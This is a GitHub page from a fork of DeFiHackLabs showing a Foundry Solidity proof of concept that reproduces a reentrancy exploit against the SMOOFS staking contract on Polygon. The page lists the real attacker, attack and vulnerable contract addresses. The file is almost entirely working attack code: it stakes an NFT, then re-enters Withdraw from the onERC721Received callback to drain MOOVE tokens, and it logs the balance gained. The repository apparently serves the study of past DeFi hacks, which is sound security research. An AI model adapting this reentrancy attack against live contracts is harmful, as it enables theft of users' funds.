forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
SMOOFSStaking_exp.sol
86 lines (74 loc) · 3.16 KB
/
SMOOFSStaking_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : Unclear
// Attacker : https://polygonscan.com/address/0x149b268b8b8101e2b5df84a601327484cb43221c
// Attack Contract : https://polygonscan.com/address/0x367120bf791cc03f040e2574aea0ca7790d3d2e5
// Vuln Contract : https://polygonscan.com/address/0x9d6cb01fb91f8c6616e822cf90a4b3d8eb0569c6
// One of the attack txs : https://phalcon.blocksec.com/explorer/tx/polygon/0xde51af983193b1be3844934b2937a76c19610ddefcdd3ffcf127db3e68749a50
// @Analysis
// https://twitter.com/AnciliaInc/status/1762893563103428783
// https://twitter.com/0xNickLFranklin/status/1762895774311178251
interface ISMOOFSStaking {
function Stake(uint256 _tokenId) external;
function Withdraw(uint256 _tokenId, bool forceWithTax) external;
}
contract ContractTest is Test {
ISMOOFSStaking private constant SMOOFSStaking =
ISMOOFSStaking(0x757C2d1Ef0942F7a1B9FC1E618Aea3a6F3441A3C);
IERC721 private constant Smoofs =
IERC721(0x551eC76C9fbb4F705F6b0114d1B79bb154747D38);
IERC20 private constant MOOVE =
IERC20(0xdb6dAe4B87Be1289715c08385A6Fc1A3D970B09d);
address private constant attackContract =
0x367120bf791cC03F040E2574AeA0ca7790D3D2E5;
uint256 private constant smoofsTokenId = 2_062;
uint256 setCount;
function setUp() public {
vm.createSelectFork("polygon", 54056707);
vm.label(address(SMOOFSStaking), "SMOOFSStaking");
vm.label(address(Smoofs), "Smoofs");
vm.label(address(MOOVE), "MOOVE");
vm.label(attackContract, "attackContract");
}
function testExploit() public {
// For the purpose of this poc transfer Smoofs NFT token from original attack contract
vm.prank(attackContract);
Smoofs.transferFrom(attackContract, address(this), smoofsTokenId);
Smoofs.approve(address(SMOOFSStaking), smoofsTokenId);
// Set initial MOOVE token balance of this contract before attack
deal(address(MOOVE), address(this), MOOVE.balanceOf(attackContract));
MOOVE.approve(address(SMOOFSStaking), type(uint256).max);
emit log_named_decimal_uint(
"Attacker MOOVE balance before exploit",
MOOVE.balanceOf(address(this)),
MOOVE.decimals()
);
// In my case call to Stake() take some time when I ran POC for the first time.
SMOOFSStaking.Stake(smoofsTokenId);
SMOOFSStaking.Withdraw(smoofsTokenId, true);
emit log_named_decimal_uint(
"Attacker MOOVE balance after exploit",
MOOVE.balanceOf(address(this)),
MOOVE.decimals()
);
}
function onERC721Received(
address operator,
address from,
uint256 tokenId,
bytes calldata data
) external returns (bytes4) {
while (setCount < 9) {
++setCount;
Smoofs.safeTransferFrom(
address(this),
address(SMOOFSStaking),
smoofsTokenId
);
SMOOFSStaking.Withdraw(smoofsTokenId, true);
}
return this.onERC721Received.selector;
}
}